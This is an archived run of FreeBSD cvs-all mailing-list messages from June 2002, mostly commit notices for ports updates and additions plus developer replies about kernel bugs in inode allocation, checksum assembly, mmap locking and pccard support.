X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG keramida 2002/06/22 20:10:18 PDT Removed files: en_US.ISO8859-1/books/handbook/contrib Makefile chapter.sgml Log: These haven't built for a while. Let them RIP now that we have an article with the same stuff. Revision Changes Path 1.2 +0 -15 doc/en_US.ISO8859-1/books/handbook/contrib/Makefile (dead) 1.473 +0 -480 doc/en_US.ISO8859-1/books/handbook/contrib/chapter.sgml (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 20:15:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 18F9E37B404; Sat, 22 Jun 2002 20:15:49 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N3FnG17161; Sat, 22 Jun 2002 20:15:49 -0700 (PDT) (envelope-from pat) Message-Id: <200206230315.g5N3FnG17161@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 20:15:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/tightvnc Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 20:15:48 PDT Modified files: net/tightvnc Makefile Log: Add USE_PERL5 PR: 39672 Submitted by: Oliver Braun Revision Changes Path 1.9 +1 -0 ports/net/tightvnc/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 20:58:23 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 69FCD37B401; Sat, 22 Jun 2002 20:58:15 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id NAA21843; Sun, 23 Jun 2002 13:58:07 +1000 Date: Sun, 23 Jun 2002 14:03:09 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Kirk McKusick Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/ufs/ffs ffs_alloc.c In-Reply-To: <200206222124.g5MLOw243907@freefall.freebsd.org> Message-ID: <20020623134003.M10753-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, 22 Jun 2002, Kirk McKusick wrote: > mckusick 2002/06/22 14:24:58 PDT > > Modified files: > sys/ufs/ffs ffs_alloc.c > Log: > This patch fixes a problem whereby filesystems that ran > out of inodes in a cylinder group would fail to check for > free inodes in other cylinder groups. This bug was introduced > in the UFS2 code merge two days ago. > > An inode is allocated by calling ffs_valloc which calls > ffs_hashalloc to do the filesystem scan. Ffs_hashalloc > walks around the cylinder groups calling its passed allocator > (ffs_nodealloccg in this case) until the allocator returns a > non-zero result. The bug is that ffs_hashalloc expects the > passed allocator function to return a 64-bit ufs2_daddr_t. > When allocating inodes, it calls ffs_nodealloccg which was > returning a 32-bit ino_t. The ffs_hashalloc code checked > a 64-bit return value and usually found random non-zero bits in > the high 32-bits so decided that the allocation had succeeded > (in this case in the only cylinder group that it checked). > When the result was passed back to ffs_valloc it looked at > only the bottom 32-bits, saw zero and declared the system > out of inodes. But ffs_hashalloc had really only checked > one cylinder group. > > The fix is to change ffs_nodealloccg to return 64-bit results. This bug has a long history. I first noticed it when I added full prototypes to the kernel in 1995. Rev.1.20 broke a warning about it using a bogus cast. I didn't merge rev.1.20 until last year when warnings became errors. Then I replaced the warning by a comment: %%% Index: ffs_alloc.c =================================================================== RCS file: /home/ncvs/src/sys/ufs/ffs/ffs_alloc.c,v retrieving revision 1.93 diff -u -2 -r1.93 ffs_alloc.c --- ffs_alloc.c 21 Jun 2002 06:18:03 -0000 1.93 +++ ffs_alloc.c 22 Jun 2002 18:17:06 -0000 @@ -855,6 +889,13 @@ fs->fs_contigdirs[cg]--; } + /* + * XXX bogusly cast ffs_nodealloccg to break the warning about the + * bug that ffs_nodealloccg is not suitable for use here. It + * returns ino_t, but alloc-functions must return ufs_daddr_t. + * This currently more or less works because ino_t is int32_t and + * ufs_daddr_t is u_int32_t. + */ ino = (ino_t)ffs_hashalloc(pip, cg, ipref, mode, - (allocfcn_t *)ffs_nodealloccg); + (allocfcn_t *)ffs_nodealloccg); if (ino == 0) goto noinodes; %%% Fixing this correctly wasn't possible until UFS2, since large ino_t's were not representable as ufs_daddr_t's. Returning ufs_daddr_t from ffs_nodealloccg() would have worked in practice on 2's complement machines. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 21:13:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 82CF437B408; Sat, 22 Jun 2002 21:13:37 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N4Dbj28854; Sat, 22 Jun 2002 21:13:37 -0700 (PDT) (envelope-from pat) Message-Id: <200206230413.g5N4Dbj28854@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 21:13:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/maradns Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 21:13:37 PDT Modified files: net/maradns Makefile distinfo Log: Update to 1.0.00 Revision Changes Path 1.21 +1 -1 ports/net/maradns/Makefile 1.20 +1 -1 ports/net/maradns/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 21:22:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DFA4D37B400; Sat, 22 Jun 2002 21:22:13 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N4MD730133; Sat, 22 Jun 2002 21:22:13 -0700 (PDT) (envelope-from pat) Message-Id: <200206230422.g5N4MD730133@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 21:22:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/cad/qfsm Makefile distinfo ports/cad/qfsm/files patch-Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 21:22:13 PDT Modified files: cad/qfsm Makefile distinfo cad/qfsm/files patch-Makefile.in Log: Update to 0.40 PR: 39165 Submitted by: Oliver Braun Revision Changes Path 1.2 +2 -2 ports/cad/qfsm/Makefile 1.2 +1 -1 ports/cad/qfsm/distinfo 1.2 +4 -4 ports/cad/qfsm/files/patch-Makefile.in To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 21:29:20 2002 Delivered-To: cvs-all@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-56.dsl.lsan03.pacbell.net [63.207.60.56]) by hub.freebsd.org (Postfix) with ESMTP id C958937B400; Sat, 22 Jun 2002 21:29:13 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 45F6E66B8B; Sat, 22 Jun 2002 21:29:13 -0700 (PDT) Date: Sat, 22 Jun 2002 21:29:13 -0700 From: Kris Kennaway To: John Polstra Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/i386/i386 in_cksum.c src/sys/i386/include in_cksum.h Message-ID: <20020622212912.A42681@xor.obsecurity.org> References: <200206222235.g5MMZrd58098@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="8t9RHnE3ZwKMSgU+" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206222235.g5MMZrd58098@freefall.freebsd.org>; from jdp@FreeBSD.org on Sat, Jun 22, 2002 at 03:35:53PM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --8t9RHnE3ZwKMSgU+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Jun 22, 2002 at 03:35:53PM -0700, John Polstra wrote: > jdp 2002/06/22 15:35:53 PDT >=20 > Modified files: > sys/i386/i386 in_cksum.c=20 > sys/i386/include in_cksum.h=20 > Log: > Fix several bugs in the i386 asm statements used to speed up Internet > checksumming. These bugs could possibly cause bad code to be > generated at elevated optimization levels. I'm pretty sure I've seen this bug in action with -O2 kernels (years ago) - good catch! Kris --8t9RHnE3ZwKMSgU+ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9FU6XWry0BWjoQKURAjHYAJ9BgeABYmy8e77+Z+U/8v0D59lkzACfTnf1 VCxYh3Q+gfGDdheivKXgGW8= =C21G -----END PGP SIGNATURE----- --8t9RHnE3ZwKMSgU+-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 21:39:56 2002 Delivered-To: cvs-all@freebsd.org Received: from rover.village.org (rover.bsdimp.com [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 1CCBD37B404; Sat, 22 Jun 2002 21:39:54 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.3/8.11.3) with ESMTP id g5N4drY68138; Sat, 22 Jun 2002 22:39:53 -0600 (MDT) (envelope-from imp@village.org) Received: from localhost (warner@rover2.village.org [10.0.0.1]) by harmony.village.org (8.11.6/8.11.6) with ESMTP id g5N4doG41333; Sat, 22 Jun 2002 22:39:52 -0600 (MDT) (envelope-from imp@village.org) Date: Sat, 22 Jun 2002 22:39:43 -0600 (MDT) Message-Id: <20020622.223943.71878899.imp@village.org> To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/pccard i82365.h pccard.c pcic.c pcic_pci.c pcic_pci.h From: "M. Warner Losh" In-Reply-To: <200206230155.g5N1tG396625@freefall.freebsd.org> References: <200206230155.g5N1tG396625@freefall.freebsd.org> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message: <200206230155.g5N1tG396625@freefall.freebsd.org> Warner Losh writes: : Extra Special Thanks To: Scott Lamber for his kind and generous loan : of a Toshiba laptop with a ToPIC 100 in it for my use. Scott Lambert, I mean. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 21:48:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 462A837B407; Sat, 22 Jun 2002 21:48:05 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N4m5j33124; Sat, 22 Jun 2002 21:48:05 -0700 (PDT) (envelope-from pat) Message-Id: <200206230448.g5N4m5j33124@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 21:48:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/games/crimson Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 21:48:04 PDT Modified files: games/crimson Makefile distinfo pkg-plist Log: Update to 0.2.5 PR: ports/39126 Submitted by: maintainer Revision Changes Path 1.7 +2 -2 ports/games/crimson/Makefile 1.3 +1 -1 ports/games/crimson/distinfo 1.3 +1 -0 ports/games/crimson/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 21:49:58 2002 Delivered-To: cvs-all@freebsd.org Received: from leviathan.inethouston.net (leviathan.inethouston.net [66.64.12.249]) by hub.freebsd.org (Postfix) with ESMTP id 417AF37B401; Sat, 22 Jun 2002 21:49:53 -0700 (PDT) Received: by leviathan.inethouston.net (Postfix, from userid 1001) id 4D24F3198DE; Sat, 22 Jun 2002 23:49:50 -0500 (CDT) Date: Sat, 22 Jun 2002 23:49:50 -0500 From: "David W. Chapman Jr." To: "M. Warner Losh" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/pccard i82365.h pccard.c pcic.c pcic_pci.c pcic_pci.h Message-ID: <20020623044950.GA25967@leviathan.inethouston.net> Reply-To: "David W. Chapman Jr." Mail-Followup-To: "M. Warner Losh" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206230155.g5N1tG396625@freefall.freebsd.org> <20020622.223943.71878899.imp@village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020622.223943.71878899.imp@village.org> X-Operating-System: FreeBSD 4.6-STABLE i386 User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 10:39:43PM -0600, M. Warner Losh wrote: > In message: <200206230155.g5N1tG396625@freefall.freebsd.org> > Warner Losh writes: > : Extra Special Thanks To: Scott Lamber for his kind and generous loan > : of a Toshiba laptop with a ToPIC 100 in it for my use. > > Scott Lambert, I mean. My linksys card no longer works with oldcard, could this be related to the recent commit you made? I am loading oldcard as a kld now as compared to statically compiling, so it may be that. This seems a little conflicting though, the card reports version 2 and 3 if I understand the following correctly. Jun 22 23:35:02 pccardd[214]: Card "Linksys"("EtherFast 10/100 PC Card (PCMPC10 0 V3)") [V2.0] [ ] matched "Linksys" ("/Ether[Ff]ast 10/100 PC Card \(PCMPC100.* \)/") [(null)] [(null)] -- David W. Chapman Jr. dwcjr@inethouston.net Raintree Network Services, Inc. dwcjr@freebsd.org FreeBSD Committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22: 6:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E6A3E37B40B; Sat, 22 Jun 2002 22:06:24 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N56Ot39542; Sat, 22 Jun 2002 22:06:24 -0700 (PDT) (envelope-from will) Message-Id: <200206230506.g5N56Ot39542@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 22:06:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm Makefile ports/x11-wm/keramik Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 22:06:24 PDT Modified files: x11-wm Makefile Added files: x11-wm/keramik Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Add keramik 1.0, the Keramik KDE style engine. PR: 39663 Submitted by: Miguel Mendez Revision Changes Path 1.93 +1 -0 ports/x11-wm/Makefile 1.1 +30 -0 ports/x11-wm/keramik/Makefile (new) 1.1 +1 -0 ports/x11-wm/keramik/distinfo (new) 1.1 +1 -0 ports/x11-wm/keramik/pkg-comment (new) 1.1 +3 -0 ports/x11-wm/keramik/pkg-descr (new) 1.1 +27 -0 ports/x11-wm/keramik/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22: 7: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3C8C137B40D; Sat, 22 Jun 2002 22:06:38 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N56c939597; Sat, 22 Jun 2002 22:06:38 -0700 (PDT) (envelope-from will) Message-Id: <200206230506.g5N56c939597@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 22:06:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 22:06:38 PDT Modified files: . modules Log: keramik --> ports/x11-wm/keramik Revision Changes Path 1.5402 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22:19:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 30EF037B407; Sat, 22 Jun 2002 22:19:28 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N5JSx41237; Sat, 22 Jun 2002 22:19:28 -0700 (PDT) (envelope-from will) Message-Id: <200206230519.g5N5JSx41237@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 22:19:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/news Makefile ports/news/nget Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 22:19:28 PDT Modified files: news Makefile Added files: news/nget Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Add nget 0.19.1, an auto-resuming command line nntp file grabber. PR: 39626 Submitted by: George Sorsby Revision Changes Path 1.76 +1 -0 ports/news/Makefile 1.1 +37 -0 ports/news/nget/Makefile (new) 1.1 +1 -0 ports/news/nget/distinfo (new) 1.1 +1 -0 ports/news/nget/pkg-comment (new) 1.1 +9 -0 ports/news/nget/pkg-descr (new) 1.1 +2 -0 ports/news/nget/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22:20: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D7B1337B40C; Sat, 22 Jun 2002 22:19:38 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N5JcQ41286; Sat, 22 Jun 2002 22:19:38 -0700 (PDT) (envelope-from will) Message-Id: <200206230519.g5N5JcQ41286@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 22:19:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 22:19:38 PDT Modified files: . modules Log: nget --> ports/news/nget Revision Changes Path 1.5403 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22:25:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5A25537B401; Sat, 22 Jun 2002 22:25:11 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N5PBn42364; Sat, 22 Jun 2002 22:25:11 -0700 (PDT) (envelope-from will) Message-Id: <200206230525.g5N5PBn42364@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 22:25:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net Makefile ports/net/kopete Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 22:25:11 PDT Modified files: net Makefile Added files: net/kopete Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Add kopete 0.4.1, a KDE instant messaging system (ICQ, AIM, MSN, Jabber). PR: 39648 Submitted by: Stefan Jahn Revision Changes Path 1.791 +1 -0 ports/net/Makefile 1.1 +21 -0 ports/net/kopete/Makefile (new) 1.1 +1 -0 ports/net/kopete/distinfo (new) 1.1 +1 -0 ports/net/kopete/pkg-comment (new) 1.1 +12 -0 ports/net/kopete/pkg-descr (new) 1.1 +132 -0 ports/net/kopete/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22:25:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BE97537B406; Sat, 22 Jun 2002 22:25:27 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N5PRa42432; Sat, 22 Jun 2002 22:25:27 -0700 (PDT) (envelope-from will) Message-Id: <200206230525.g5N5PRa42432@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 22:25:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 22:25:27 PDT Modified files: . modules Log: kopete --> ports/net/kopete Revision Changes Path 1.5404 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22:27:12 2002 Delivered-To: cvs-all@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id 5822637B403; Sat, 22 Jun 2002 22:27:10 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1192) id 35515AE163; Sat, 22 Jun 2002 22:27:10 -0700 (PDT) Date: Sat, 22 Jun 2002 22:27:10 -0700 From: Alfred Perlstein To: Alan Cox Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/vm vm_mmap.c Message-ID: <20020623052710.GK53232@elvis.mu.org> References: <200206230148.g5N1mN795443@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206230148.g5N1mN795443@freefall.freebsd.org> User-Agent: Mutt/1.3.27i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Alan Cox [020622 18:48] wrote: > alc 2002/06/22 18:48:23 PDT > > Modified files: > sys/vm vm_mmap.c > Log: > o Remove the unnecessary acquisition and release of Giant around fdrop() > in mmap(2). I think fdrop() may need Giant in case a race with a thread makes it the instance of fdrop() that leads to fclose() being called which can call down into the VFS code. -- -Alfred Perlstein [alfred@freebsd.org] 'Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom.' Tax deductible donations for FreeBSD: http://www.freebsdfoundation.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22:59:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1495E37B401; Sat, 22 Jun 2002 22:59:28 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N5xSn46461; Sat, 22 Jun 2002 22:59:28 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206230559.g5N5xSn46461@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 22:59:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors Makefile ports/editors/kile Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 22:59:27 PDT Modified files: editors Makefile Added files: editors/kile Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add kile 1.0 A LaTeX source editor for KDE PR: 39667 Submitted by: Stefan Jahn Revision Changes Path 1.203 +1 -0 ports/editors/Makefile 1.1 +21 -0 ports/editors/kile/Makefile (new) 1.1 +1 -0 ports/editors/kile/distinfo (new) 1.1 +1 -0 ports/editors/kile/pkg-comment (new) 1.1 +12 -0 ports/editors/kile/pkg-descr (new) 1.1 +421 -0 ports/editors/kile/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 22:59:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D589E37B406; Sat, 22 Jun 2002 22:59:30 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N5xUu46496; Sat, 22 Jun 2002 22:59:30 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206230559.g5N5xUu46496@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 22:59:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 22:59:30 PDT Modified files: . modules Log: kile --> ports/editors/kile Revision Changes Path 1.5405 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23: 4: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D4C6737B403; Sat, 22 Jun 2002 23:04:01 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N641C47883; Sat, 22 Jun 2002 23:04:01 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206230604.g5N641C47883@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 23:04:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/amcl Makefile ports/net/angst Makefile ports/net/cnet Makefile ports/net/dlint Makefile ports/net/fidelio Makefile ports/net/forg Makefile ports/net/fping 